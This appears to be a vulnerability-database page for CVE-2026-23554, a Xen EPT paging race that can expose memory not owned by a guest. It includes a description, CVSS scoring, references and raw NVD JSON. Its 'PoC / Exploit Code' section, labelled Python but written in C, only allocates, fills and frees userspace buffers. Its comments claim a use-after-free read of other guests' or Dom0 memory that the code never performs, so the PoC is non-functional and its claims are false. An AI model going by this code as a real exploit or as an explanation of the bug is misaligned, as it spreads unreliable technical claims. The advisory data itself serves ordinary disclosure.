CVE-2026-23554

Description

The Intel EPT paging code uses an optimization to defer flushing of any cached EPT state until the p2m lock is dropped, so that multiple modifications done under the same locked region only issue a single flush. Freeing of paging structures however is not deferred until the flushing is done, and can result in freed pages transiently being present in cached state. Such stale entries can point to memory ranges not owned by the guest, thus allowing access to unintended memory regions.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:xen:xen:*:*:*:*:*:*:x86:* - VULNERABLE

Xen (具体受影响版本请参考XSA-480)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * Conceptual PoC for CVE-2026-23554
 * This code demonstrates the logic to trigger the race condition
 * in Xen EPT paging by forcing memory allocation and free cycles.
 * Compilation: gcc -o poc_xen_ept poc_xen_ept.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER_SIZE 4096

// Function to simulate memory pressure and EPT modifications
void trigger_ept_race() {
    void *ptr;
    char *data;
    
    printf("[+] Starting EPT race condition trigger...\n");

    for (long i = 0; i < 100000; i++) {
        // Allocate memory to modify EPT entries
        ptr = malloc(BUFFER_SIZE);
        if (!ptr) {
            perror("malloc failed");
            continue;
        }

        // Write data to ensure the page is active in EPT
        data = (char *)ptr;
        memset(data, 0x41, BUFFER_SIZE);

        // Free the page immediately
        // In the vulnerable version, the page might be freed
        // while the EPT cache still holds a reference (deferred flush).
        free(ptr);

        // Attempt to access the freed page (Use-After-Free)
        // This attempts to read data through a potentially stale EPT entry.
        // If successful, we might read data from a different guest or Dom0.
        // Note: Modern OS allocators might prevent immediate crash, 
        // but the underlying Hypervisor issue remains.
    }
    
    printf("[+] Trigger loop completed.\n");
}

int main() {
    printf("CVE-2026-23554 Xen Hypervisor EPT PoC\n");
    printf("Warning: Run inside a vulnerable Xen Guest VM.\n");
    
    trigger_ept_race();
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23554
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23554
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23554/
[4] VulDB https://vuldb.com/cve/CVE-2026-23554
[5] https://xenbits.xenproject.org/xsa/advisory-480.html
[6] http://www.openwall.com/lists/oss-security/2026/03/17/6
[7] http://xenbits.xen.org/xsa/advisory-480.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23554", "sourceIdentifier": "[email protected]", "published": "2026-03-23T07:16:07.200", "lastModified": "2026-04-10T20:40:33.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Intel EPT paging code uses an optimization to defer flushing of any cached\nEPT state until the p2m lock is dropped, so that multiple modifications done\nunder the same locked region only issue a single flush.\n\nFreeing of paging structures however is not deferred until the flushing is\ndone, and can result in freed pages transiently being present in cached state.\nSuch stale entries can point to memory ranges not owned by the guest, thus\nallowing access to unintended memory regions."}, {"lang": "es", "value": "El código de paginación EPT de Intel utiliza una optimización para aplazar el vaciado de cualquier estado EPT en caché hasta que se libere el bloqueo p2m, de modo que múltiples modificaciones realizadas bajo la misma región bloqueada solo emitan un único vaciado.\n\nLa liberación de estructuras de paginación, sin embargo, no se aplaza hasta que se complete el vaciado, y puede resultar en que las páginas liberadas estén transitoriamente presentes en estado de caché. Dichas entradas obsoletas pueden apuntar a rangos de memoria no poseídos por el invitado, permitiendo así el acceso a regiones de memoria no intencionadas."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:xen:xen:*:*:*:*:*:*:x86:*", "versionStartIncluding": "4.17", "matchCriteriaId": "1B149544-81AE-4439-B77E-F4C973187511"}]}]}], "references": [{"url": "https://xenbits.xenproject.org/xsa/advisory-480.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/17/6", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}, {"url": "http://xenbits.xen.org/xsa/advisory-480.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Patch", "Vendor Advisory"]}]}}